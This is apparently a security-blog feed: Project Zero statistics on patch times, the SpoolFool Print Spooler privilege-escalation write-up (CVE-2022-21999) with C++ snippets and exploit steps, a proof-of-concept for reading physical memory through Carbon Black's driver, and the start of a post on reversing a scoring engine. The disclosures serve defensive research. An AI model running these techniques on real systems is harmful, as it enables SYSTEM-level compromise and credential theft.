The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser | Bugs | Avg days from bug report to public patch | Avg days from public patch to release | Avg days from bug report to release
--------|------|------------------------------------------|---------------------------------------|------------------------------------
Chrome  | 40   | 5.3                                      | 24.6                                  | 29.9
WebKit  | 27   | 11.6                                     | 61.1                                  | 72.7
Firefox | 8    | 16.6                                     | 21.1                                  | 37.8
Total   | 75   | 8.8                                      | 37.3                                  | 46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to the "Avg days from public patch to release" column):

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, WebKit, and Chrome. The fact that WebKit is still on the higher end of the histogram tells us that most of its time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with an average of 30 days from bug report to a fix shipping in the stable channel. The time to patch is very fast here, with an average of just 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public makes up the bulk of the overall window, though we still see the Chrome (blue) bars toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest average time from bug report to release, at 73 days. Its time to land the fix publicly sits between Chrome's and Firefox's, but unfortunately this leaves a very long window for opportunistic attackers to find the patch and exploit it before the fix is made available to users. This can be seen in the Apple (red) bars of the second histogram, which sit mostly on the right side of the graph, with every one except one past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch delivery, effectively reducing the overall average time to fix to about 52 days. In 2021, only one 90-day deadline was exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

First!

8 February 2022 at 17:38

Today we are launching the IFCR research blog. The ambition is to provide original research and new technical ideas and approaches to the offensive security community.

New material will be added occasionally rather than on a defined schedule. That being said, we've already got quite a few interesting posts lined up.

Stay tuned for more…!

The IFCR Offensive Ops Team


First! was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)

8 February 2022 at 20:21

UPDATE (Feb 9, 2022): Microsoft initially patched this vulnerability without giving me any information or acknowledgement, and as such, at the time of the patch release, I thought that the vulnerability was identified as CVE-2022-22718, since it was the only Print Spooler vulnerability in the release without any acknowledgement. I contacted Microsoft for clarification, and the day after the patch release, Institut For Cyber Risk and I were acknowledged for CVE-2022-21999.

In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and reported in November 2021. The vulnerability got patched as part of Microsoft’s Patch Tuesday in February 2022. We’ll take a quick tour of the components and inner workings of the Print Spooler, and then we’ll dive into the vulnerability with root cause, code snippets, images and much more. At the end of the blog post, you can also find a link to a functional exploit.

Background

Back in May 2020, Microsoft patched a Windows Print Spooler privilege escalation vulnerability. The vulnerability was assigned CVE-2020-1048, and Microsoft acknowledged Peleg Hadar and Tomer Bar of SafeBreach Labs for reporting the security issue. On the same day of the patch release, Yarden Shafir and Alex Ionescu published a technical write-up of the vulnerability. In essence, a user could write to an arbitrary file by creating a printer port that pointed to a file on disk. After the vulnerability (CVE-2020-1048) had been patched, the Print Spooler would now check if the user had permissions to create or write to the file before adding the port. A week after the release of the patch and blog post, Paolo Stagno (aka VoidSec) privately disclosed a bypass for CVE-2020-1048 to Microsoft. The bypass was patched three months later in August 2020, and Microsoft acknowledged eight independent entities for reporting the vulnerability, which was identified as CVE-2020-1337. The bypass for the vulnerability used a directory junction (symbolic link) to circumvent the security check. Suppose a user created the directory C:\MyFolder\ and configured a printer port to point to the file C:\MyFolder\Port. This operation would be granted, since the user is indeed allowed to create C:\MyFolder\Port. Now, what would happen if the user then turned C:\MyFolder\ into a directory junction that pointed to C:\Windows\System32\ after the port had been created? Well, the Spooler would simply write to the file C:\Windows\System32\Port.

These two vulnerabilities, CVE-2020-1048 and CVE-2020-1337, were patched in May and August 2020, respectively. In September 2020, Microsoft patched a different vulnerability in the Print Spooler. In short, this vulnerability allowed users to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a printer. What was the patch? Almost the same story: After the patch, the Print Spooler would now check if the user had permissions to create the directory before setting the SpoolDirectory property on a printer. Perhaps you can already see where this post is going. Let's start at the beginning.

Introduction to Spooler Components

The Windows Print Spooler is a built-in component on all Windows workstations and servers, and it is the primary component of the printing interface. The Print Spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The Spooler is loaded at system startup and continues to run until the operating system is shut down. The primary components of the Print Spooler are illustrated in the following diagram.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components

Application

The print application creates a print job by calling Graphics Device Interface (GDI) functions or directly into winspool.drv.

GDI

The Graphics Device Interface (GDI) includes both user-mode and kernel-mode components for graphics support.

winspool.drv

winspool.drv is the client interface into the Spooler. It exports the functions that make up the Spooler’s Win32 API, and provides RPC stubs for accessing the server.

spoolsv.exe

spoolsv.exe is the Spooler’s API server. It is implemented as a service that is started when the operating system is started. This module exports an RPC interface to the server side of the Spooler’s Win32 API. Clients of spoolsv.exe include winspool.drv (locally) and win32spl.dll (remotely). The module implements some API functions, but most function calls are passed to a print provider by means of the router (spoolss.dll).

Router

The router, spoolss.dll, determines which print provider to call, based on a printer name or handle supplied with each function call, and passes the function call to the correct provider.

Print Provider

The print provider that supports the specified print device.

Local Print Provider

The local print provider provides job control and printer management capabilities for all printers that are accessed through the local print provider’s port monitors.

The following diagram provides a view of control flow among the local printer provider’s components, when an application creates a print job.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-print-providers

While this control flow is rather large, we will mostly focus on the local print provider localspl.dll.

Vulnerability

The vulnerability consists of two bypasses for CVE-2020-1030. I highly recommend reading Victor Mata's blog post on CVE-2020-1030, but I'll try to cover the important parts as well.

When a user prints a document, a print job is spooled to a predefined location referred to as the “spool directory”. The spool directory is configurable on each printer and it must allow the FILE_ADD_FILE permission to all users.

Permissions of the default spool directory

Individual spool directories are supported by defining the SpoolDirectory value in a printer’s registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer>.

The Print Spooler provides APIs for managing configuration data such as EnumPrinterData, GetPrinterData, SetPrinterData, and DeletePrinterData. Underneath, these functions perform registry operations relative to the printer’s key.

We can modify a printer’s configuration with SetPrinterDataEx. This function requires a printer to be opened with the PRINTER_ACCESS_ADMINISTER access right. If the current user doesn’t have permission to open an existing printer with the PRINTER_ACCESS_ADMINISTER access right, there are two options:

  • The user can create a new local printer
  • The user can add a remote printer

By default, users in the INTERACTIVE group have the “Manage Server” permission and can therefore create new local printers, as shown below.

Security of the local print server on Windows desktops
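
For illustration, here's a minimal sketch of creating such a local printer via the documented winspool API. The printer and driver names mirror the inbox XPS driver that the exploit uses later; treat the exact PRINTER_INFO_2 values as example assumptions rather than the exploit's literal code.

#include <windows.h>
#include <winspool.h>
#pragma comment(lib, "winspool.lib")

int wmain()
{
    // Reuse an inbox driver so no driver package needs to be installed.
    PRINTER_INFO_2W info = {};
    info.pPrinterName    = const_cast<LPWSTR>(L"Microsoft XPS Document Writer v4");
    info.pDriverName     = const_cast<LPWSTR>(L"Microsoft XPS Document Writer v4");
    info.pPortName       = const_cast<LPWSTR>(L"PORTPROMPT:");
    info.pPrintProcessor = const_cast<LPWSTR>(L"winprint");
    info.pDatatype       = const_cast<LPWSTR>(L"RAW");

    HANDLE hPrinter = AddPrinterW(nullptr, 2, reinterpret_cast<LPBYTE>(&info));
    if (!hPrinter)
        return 1;

    // As the creator of the printer, we can later reopen it with
    // PRINTER_ACCESS_ADMINISTER.
    ClosePrinter(hPrinter);
    return 0;
}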

However, it seems that this permission is only granted on Windows desktops, such as Windows 10 and Windows 11. During my testing on Windows servers, this permission was not present. Nonetheless, it was still possible for users without the “Manage Server” permission to add remote printers.

If a user adds a remote printer, the printer will inherit the security properties of the shared printer from the printer server. As such, if the remote printer server allows Everyone to manage the printer, then it's possible to obtain a handle to the printer with the PRINTER_ACCESS_ADMINISTER access right, and SetPrinterDataEx would update the local registry as usual. A user could therefore create a shared printer on a different server or workstation, and grant Everyone the right to manage the printer. On the victim server, the user could then add the remote printer, which would now be manageable by Everyone. While I haven't fully tested how this vulnerability behaves on remote printers, it could be a viable option for situations where the user cannot create or manage a local printer. But please note that while some operations are handled by the local print provider, others are handled by the remote print provider.

When we have opened or created a printer with the PRINTER_ACCESS_ADMINISTER access right, we can configure the SpoolDirectory on it.
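
As a sketch (the printer name and directory are example values, and the "\\" key name addressing the printer's root registry key follows the public exploit; treat it as an assumption):

#include <windows.h>
#include <winspool.h>
#pragma comment(lib, "winspool.lib")

int wmain()
{
    PRINTER_DEFAULTSW defaults = {};
    defaults.DesiredAccess = PRINTER_ACCESS_ADMINISTER;

    HANDLE hPrinter = nullptr;
    if (!OpenPrinterW(const_cast<LPWSTR>(L"Microsoft XPS Document Writer v4"),
                      &hPrinter, &defaults))
        return 1;

    // The Spooler validates this path now, but only creates it on the next
    // initialization -- which is what makes the junction switch possible.
    wchar_t spoolDir[] = L"C:\\spooldir\\printers";
    DWORD err = SetPrinterDataExW(hPrinter, L"\\", L"SpoolDirectory", REG_SZ,
                                  reinterpret_cast<LPBYTE>(spoolDir), sizeof(spoolDir));
    ClosePrinter(hPrinter);
    return err == ERROR_SUCCESS ? 0 : 1;
}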

When calling SetPrinterDataEx, an RPC request will be sent to the local Print Spooler spoolsv.exe, which will route the request to the local print provider’s implementation in localspl.dll!SplSetPrinterDataEx. The control flow consists of the following events:

  1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue

In the case of setting the SpoolDirectory value, localspl.dll!SplSetPrinterDataEx will verify that the provided directory is valid before updating the registry key. This check was not present before CVE-2020-1030.

localspl.dll!SplSetPrinterDataEx

Given a path to a directory, localspl.dll!IsValidSpoolDirectory will call localspl.dll!AdjustFileName to convert the path into a canonical path. For instance, the canonical path for C:\spooldir\ would be \\?\C:\spooldir\, and if C:\spooldir\ is a symbolic link to C:\Windows\System32\, the canonical path would be \\?\C:\Windows\System32\. Then, localspl.dll!IsValidSpoolDirectory will check if the current user is allowed to open or create the directory with GENERIC_WRITE access right. If the directory was successfully created or opened, the function will make a final check that the number of links to the directory is not greater than 1, as returned by GetFileInformationByHandle.

localspl.dll!IsValidSpoolDirectory

So in order to set the SpoolDirectory, the user must be able to create or open the directory with writable permissions. If the validation succeeds, the print provider will update the printer’s SpoolDirectory registry key. However, the spool directory will not be created by the Print Spooler until it has been reinitialized. This means that we will need to figure out how to restart the Spooler service (we will come back to this part), but it also means that the user only needs to be able to create the directory during the validation when setting the SpoolDirectory registry key — and not when the directory is actually created.

In order to bypass the validation, we can use reparse points (directory junctions in this case). Suppose we create a directory named C:\spooldir\, and we set the SpoolDirectory to C:\spooldir\printers\. The Spooler will check that the user can create the directory printers inside of C:\spooldir\. The validation passes, and the SpoolDirectory gets set to C:\spooldir\printers\. After we have configured the SpoolDirectory, we can convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\. When the Spooler initializes, the directory C:\Windows\System32\printers\ will be created with writable permissions for everyone. If the directory already exists, the Spooler will not set writable permissions on the folder.
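
To illustrate the switch, here is a quick-and-dirty sketch. The public exploit sets the reparse point programmatically via FSCTL_SET_REPARSE_POINT; shelling out to the built-in mklink /J is a simpler stand-in for illustration, and it also works without elevation:

#include <cstdlib>
#include <cstdio>

int main()
{
    // C:\spooldir must be empty: remove it and let mklink recreate it as a
    // junction (mount point) to the target directory.
    std::system("rmdir C:\\spooldir");
    int rc = std::system("mklink /J C:\\spooldir C:\\Windows\\System32");
    if (rc != 0)
        std::printf("failed to create junction\n");
    return rc;
}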

As such, we need to find an interesting place to create a directory. One such place is C:\Windows\System32\spool\drivers\x64\, also known as the printer driver directory (on other architectures, the last path component is not x64). The printer driver directory is particularly interesting, because if we call SetPrinterDataEx with the CopyFiles registry key, the Spooler will automatically load the DLL assigned in the Module value — if the Module file path is allowed.

This event is triggered when pszKeyName begins with the CopyFiles\ string. It initiates a sequence of functions leading to LoadLibrary.

localspl.dll!SplSetPrinterDataEx

The control flow consists of the following events:

  1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue
  3. localspl.dll!SplCopyFileEvent is called if the pszKeyName argument begins with the CopyFiles\ string
  4. localspl.dll!SplCopyFileEvent reads the Module value from the printer's CopyFiles registry key and passes the string to localspl.dll!SplLoadLibraryTheCopyFileModule
  5. localspl.dll!SplLoadLibraryTheCopyFileModule performs validation on the Module file path
  6. If validation passes, localspl.dll!SplLoadLibraryTheCopyFileModule attempts to load the module with LoadLibrary

The validation steps consist of localspl.dll!MakeCanonicalPath and localspl.dll!IsModuleFilePathAllowed. The function localspl.dll!MakeCanonicalPath will take a path and convert it into a canonical path, as described earlier.

localspl.dll!MakeCanonicalPath

localspl.dll!IsModuleFilePathAllowed will validate that the canonical path either resides directly inside of C:\Windows\System32\ or within the printer driver directory. For instance, C:\Windows\System32\payload.dll would be allowed, whereas C:\Windows\System32\Tasks\payload.dll would not. Any path inside of the printer driver directory is allowed, e.g. C:\Windows\System32\spool\drivers\x64\my\path\to\payload.dll is allowed. If we are able to create a DLL in C:\Windows\System32\ or anywhere in the printer driver directory, we can load the DLL into the Spooler service.

localspl.dll!SplLoadLibraryTheCopyFileModule
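
Assuming we already hold the PRINTER_ACCESS_ADMINISTER handle from earlier, a sketch of the trigger could look like this. The CopyFiles subkey name "Payload" is arbitrary, and the DLL path in the usage comment is an example that passes the check:

#include <windows.h>
#include <winspool.h>
#include <cwchar>

// Writing the Module value under a CopyFiles\ subkey drives localspl.dll
// through SplCopyFileEvent -> SplLoadLibraryTheCopyFileModule -> LoadLibrary.
DWORD LoadModuleViaCopyFiles(HANDLE hPrinter, const wchar_t* dllPath)
{
    DWORD cb = static_cast<DWORD>((wcslen(dllPath) + 1) * sizeof(wchar_t));
    return SetPrinterDataExW(hPrinter, L"CopyFiles\\Payload", L"Module",
                             REG_SZ, (LPBYTE)dllPath, cb);
}

// e.g. LoadModuleViaCopyFiles(hPrinter,
//          L"C:\\Windows\\System32\\spool\\drivers\\x64\\printers\\payload.dll");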

Now, we know that we can use the SpoolDirectory to create an arbitrary directory with writable permissions for all users, and that we can load any DLL into the Spooler service that resides in either C:\Windows\System32\ or the printer driver directory. There is only one issue though. As mentioned earlier, the spool directory is created during the Spooler initialization. The spool directory is created when localspl.dll!SplCreateSpooler calls localspl.dll!BuildPrinterInfo. Before localspl.dll!BuildPrinterInfo allows Everyone the FILE_ADD_FILE permission, a final check is made to make sure that the directory path does not reside within the printer driver directory.

localspl.dll!BuildPrinterInfo

This means that a security check during the Spooler initialization verifies that the SpoolDirectory value does not point inside of the printer driver directory. If it does, the Spooler will not create the spool directory and simply fallback to the default spool directory. This security check was also implemented in the patch for CVE-2020-1030.

To summarize, in order to load the DLL with localspl.dll!SplLoadLibraryTheCopyFileModule, the DLL must reside inside of the printer driver directory or directly inside of C:\Windows\System32\. To create the writable directory during Spooler initialization, the directory must not reside inside of the printer driver directory. Both localspl.dll!SplLoadLibraryTheCopyFileModule and localspl.dll!BuildPrinterInfo check if the path points inside the printer driver directory. In the first case, we must make sure that the DLL path begins with C:\Windows\System32\spool\drivers\x64\, and in the second case, we must make sure that the directory path does not begin with C:\Windows\System32\spool\drivers\x64\.

During both checks, the SpoolDirectory is converted to a canonical path, so even if we set the SpoolDirectory to C:\spooldir\printers\ and then convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\spool\drivers\x64\, the canonical path will still become \\?\C:\Windows\System32\spool\drivers\x64\printers\. The check is done by stripping off the first four bytes of the canonical path, i.e. \\?\C:\Windows\System32\spool\drivers\x64\printers\ becomes C:\Windows\System32\spool\drivers\x64\printers\, and then checking if the path begins with the printer driver directory C:\Windows\System32\spool\drivers\x64\. And so, here comes the second bug to pass both checks.

If we set the spooler directory to a UNC path, such as \\localhost\C$\spooldir\printers\ (and C:\spooldir\ is a reparse point to C:\Windows\System32\spool\drivers\x64\), the canonical path will become \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\, and during comparison, the first four bytes are stripped, so UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ is compared to C:\Windows\System32\spool\drivers\x64\ and will no longer match. When the Spooler initializes, the directory \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ will be created with writable permissions. We can now write our DLL into C:\Windows\System32\spool\drivers\x64\printers\payload.dll. We can then trigger the localspl.dll!SplLoadLibraryTheCopyFileModule, but this time, we can just specify the path normally as C:\Windows\System32\spool\drivers\x64\printers\payload.dll.

We now have the primitives to create a writable directory inside of the printer driver directory and to load a DLL within the driver directory into the Spooler service. The only thing left is to restart the Spooler service such that the directory will be created. We could wait for the server to be restarted, but there is a technique to terminate the service and rely on the recovery to restart it. By default, the Spooler service will restart on the first two “crashes”, but not on subsequent failures.

To terminate the service, we can use localspl.dll!SplLoadLibraryTheCopyFileModule to load C:\Windows\System32\AppVTerminator.dll. When loaded into Spooler, the library calls TerminateProcess which subsequently kills the spoolsv.exe process. This event triggers the recovery mechanism in the Service Control Manager which in turn starts a new Spooler process. This technique was explained for CVE-2020-1030 by Victor Mata from Accenture.

Here’s a full exploit in action. The DLL used in this example will create a new local administrator named “admin”. The DLL can also be found in the exploit repository.

SpoolFool in action

The steps for the exploit are the following:

  • Create a temporary base directory that will be used for our spool directory, which we’ll later turn into a reparse point
  • Create a new local printer named “Microsoft XPS Document Writer v4”
  • Set the spool directory of our new printer to be our temporary base directory
  • Create a reparse point on our temporary base directory to point to the printer driver directory
  • Force the Spooler to restart to create the directory by loading AppVTerminator.dll into the Spooler
  • Write DLL into the new directory inside of the printer driver directory
  • Load the DLL into the Spooler

Remember that it is sufficient to create the driver directory only once in order to load as many DLLs as desired. There's no need to trigger the exploit multiple times; doing so will most likely end up killing the Spooler service indefinitely until a reboot brings it back up. When the driver directory has been created, it is possible to keep writing and loading DLLs from the directory without restarting the Spooler service. The exploit that can be found at the end of this post will check if the driver directory already exists, and if so, it will skip the creation of the directory and jump straight to writing and loading the DLL. The second run of the exploit can be seen below.

Second run of SpoolFool

The functional exploit and DLL can be found here: https://github.com/ly4k/SpoolFool.

Conclusion

That’s it. Microsoft has officially released a patch. When I initially found out that there was a check during the actual creation of the directory as well, I started looking into other interesting places to create a directory. I found this post by Jonas L from Secret Club, where the Windows Error Reporting Service (WER) is abused to exploit an arbitrary directory creation primitive. However, the technique didn’t seem to work reliably on my Windows 10 machine. The SplLoadLibraryTheCopyFileModule technique, on the other hand, is very reliable, but it assumes that the user can manage a printer, which is already the case for this vulnerability.

Patch Analysis

[Feb 08, 2022]

A quick check with Process Monitor reveals that the SpoolDirectory is no longer created when the Spooler initializes. If the directory does not exist, the Print Spooler falls back to the default spool directory.

To be continued…

Disclosure Timeline

  • Nov 12, 2021: Reported to Microsoft Security Response Center (MSRC)
  • Nov 15, 2021: Case opened and assigned
  • Nov 19, 2021: Review and reproduction
  • Nov 22, 2021: Microsoft starts developing a patch for the vulnerability
  • Jan 21, 2022: The patch is ready for release
  • Feb 08, 2022: Patch is silently released. No acknowledgement or information received from Microsoft
  • Feb 09, 2022: Microsoft gives acknowledgement to me and Institut For Cyber Risk for CVE-2022-21999

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999) was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

Reading Physical Memory using Carbon Black's Endpoint driver

14 February 2019 at 15:22
Reading Physical Memory using Carbon Black's Endpoint driver

Enterprises rely on endpoint security software in order to secure machines that have access to the enterprise network. Usually considered the next step in the evolution of anti-virus solutions, endpoint protection software can protect against various attacks such as an employee running a Microsoft Word document with macros and other conventional attacks against enterprises. In this article, I'll be looking at Carbon Black's endpoint protection software and the vulnerabilities attackers can take advantage of. Everything I am going to review in this article has been reported to Carbon Black and they have said it is not a real security issue because it requires Administrator privileges.

Driver Authentication

The Carbon Black driver (cbk7.sys) has a basic authentication requirement before accepting IOCTLs. After opening the "\\.\CarbonBlack" device, you must send "good job you can use IDA, you get a cookie\x0\x0\x0\x0\x0\x0\x0\x0" with the IOCTL code of 0x81234024.

Setting Acquisition Mode

The acquisition mode is a value the driver uses to determine which method to use when reading physical memory; we'll get into this in the next section. To set the acquisition mode, an attacker must send the new acquisition value in the input buffer for the IOCTL 0x8123C144 as a uint32_t.

Physical Memory Read Access

The Carbon Black Endpoint Sensor driver has an IOCTL (0x8123C148) that allows you to read an arbitrary physical memory address. It gives an attacker three methods of reading physical memory:

  1. If Acquisition Mode is set to 0, the driver uses MmMapIoSpace to map the physical memory then copies the data.
  2. If Acquisition Mode is set to 1, the driver opens the "\Device\PhysicalMemory" section and copies the data.
  3. If Acquisition Mode is set to 2, the driver translates the physical address to a virtual address and copies that.

To read physical memory, you must send the following buffer:

struct PhysicalMemReadRequest {
  uint64_t ptrtoread; // The physical memory address you'd like to read.
  uint64_t bytestoread; // The number of bytes to read.
};

The output buffer size should be bytestoread.

CR3 Access

Carbon Black was nice enough to have another IOCTL (0x8123C140) that gives a list of known physical memory ranges (calls MmGetPhysicalMemoryRanges) and provides the CR3 register (Directory Base). This is great news for an attacker because it means they don't have to predict/bruteforce a directory base and instead can convert a physical memory address directly to a kernel virtual address with ease (vice-versa too!).

To call this IOCTL, you need to provide an empty input buffer and an output buffer with a minimum size of 0x938 bytes. To get the CR3, simply do *(uint64_t*)(outputbuffer).
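
Tying the pieces together, here is a minimal sketch of driving the whole flow. The IOCTL codes, cookie string, and buffer sizes come from the reversing above; the physical address is an arbitrary example, and most error handling is omitted:

#include <windows.h>
#include <cstdint>
#include <cstdio>

struct PhysicalMemReadRequest {
    uint64_t ptrtoread;   // The physical memory address to read.
    uint64_t bytestoread; // The number of bytes to read.
};

int main()
{
    HANDLE hDevice = CreateFileA("\\\\.\\CarbonBlack", GENERIC_READ | GENERIC_WRITE,
                                 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
        return 1;

    DWORD ret = 0;

    // 1. Authenticate: 42-character string plus 8 trailing NUL bytes
    //    (7 explicit here, plus the literal's implicit terminator).
    char cookie[] = "good job you can use IDA, you get a cookie\0\0\0\0\0\0\0";
    DeviceIoControl(hDevice, 0x81234024, cookie, sizeof(cookie), nullptr, 0, &ret, nullptr);

    // 2. Query physical memory ranges + CR3 (first qword of the output buffer).
    uint8_t info[0x938] = {};
    DeviceIoControl(hDevice, 0x8123C140, nullptr, 0, info, sizeof(info), &ret, nullptr);
    printf("CR3 = 0x%llx\n", *(unsigned long long*)info);

    // 3. Select acquisition mode 0 (MmMapIoSpace).
    uint32_t mode = 0;
    DeviceIoControl(hDevice, 0x8123C144, &mode, sizeof(mode), nullptr, 0, &ret, nullptr);

    // 4. Read 0x100 bytes at an example physical address.
    PhysicalMemReadRequest req = { 0x1000, 0x100 };
    uint8_t out[0x100] = {};
    if (DeviceIoControl(hDevice, 0x8123C148, &req, sizeof(req), out, sizeof(out), &ret, nullptr))
        printf("read %lu bytes of physical memory\n", (unsigned long)ret);

    CloseHandle(hDevice);
    return 0;
}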

Impact

You might ask what's the big deal if you need administrator privileges for this exploit. The issue I have is that the Carbon Black endpoint software will probably not be on an average home PC, but rather on corporate endpoints. If a company is willing to purchase software such as Carbon Black to protect their endpoints, they're probably taking other security measures too. This might include having a whitelisted driver system, secure boot, LSA Protection, etc. If an attacker gains administrator on the endpoint (e.g. if the parent process was elevated), then they could not only disable the protection of Carbon Black, but could use its driver to read sensitive information (like the memory of lsass.exe if LSA Protection is on). My point is, this vulnerability allows an attacker to use a whitelisted driver to access any memory on the system, most likely undetected by any anti-virus on the system. I don't know about you, but to me this is not something I'd accept from the software that's supposed to protect me.

The hash of the cbk7.sys driver is ec5b804c2445e84507a737654fd9aae8 (MD5) and 2afe12bfcd9a5ef77091604662bbbb8d7739b9259f93e94e1743529ca04ae1c3 (SHA256).

Reversing the CyberPatriot National Competition Scoring Engine

12 April 2019 at 22:10

Edit 4/12/2019

Reversing the CyberPatriot National Competition Scoring Engine

Originally, I published this post a month ago. After my post, I received a kind email from one of the primary developers for CyberPatriot asking that I take my post down until they can change their encryption algorithm. Given that the national competition for CyberPatriot XI was in a month, I decided to take the post down until after national competitions completed. National competitions ended yesterday which is why I am re-publishing this write up now.

Disclaimer

This article pertains to the competitions prior to 2018, as I have stopped participating in newer competitions and am therefore no longer subject to the competition’s rule book. This information is meant for educational use only and as fair use commentary on the competition in past years.

Preface

CyberPatriot is the Air Force Association's "national youth cyber education program". The gist of the competition is that competitors (teams around the nation) are given virtual machines that are vulnerable, usually due to configuration issues or malicious files. Competitors must find and patch these holes to gain points.

The points are calculated by the CyberPatriot Scoring Engine, a program which runs on the vulnerable virtual machine and does routine checks on different aspects of the system that are vulnerable to see if they were patched.

I am a high school senior who participated in the competition in 2015-2016, 2016-2017, and 2017-2018, for a total of 3 years. My team consistently got to regionals, and once even got under the 12th-place cut-off for nationals for a good hour. I did not participate this year because unfortunately the organization which was hosting CyberPatriot teams, ours included, stopped due to the learning curve.

This all started when I was cleaning up my hard drive to clear up some space. I found an old folder called "CyberPatriot Competition Images" and decided to take a look. In the years I was competing in CyberPatriot, I had some reversing knowledge, but it was nothing compared to what I can do today. I thought it would be a fun experiment to take a look at the most critical piece of the CyberPatriot infrastructure - the scoring engine. In this article, I'm going to be taking an in-depth look into the CyberPatriot scoring engine, specifically for the 2017-2018 (CyberPatriot X) year.

General Techniques

If all you wanted to do was see what the engine accesses, the easiest way would be to hook different Windows API functions such as CreateFileW or RegOpenKeyExA. The reason I wanted to go deeper is that hooking alone doesn't show what they're actually checking for, which is the juicy data we want.

Reversing

When the Scoring Engine first starts, it initially registers service control handlers and does generic service status updates. The part we are interested in is when it first initializes.

Before the engine can start scanning for vulnerabilities, it needs to know what to check and where to send the results of the checks to. The interesting part of the Scoring Engine is that this information is stored offline. This means, everything the virtual machine you are using will check is stored on disk and does not require an internet connection. This somewhat surprised me because storing the upload URL and other general information on disk makes sense, but storing what's going to be scored?

After initializing service related classes, the engine instantiates a class that will contain the parsed information from the local scoring data. Local scoring data is stored (encrypted) in a file called "ScoringResource.dat". This file is typically stored in the "C:\CyberPatriot" folder in the virtual machine.

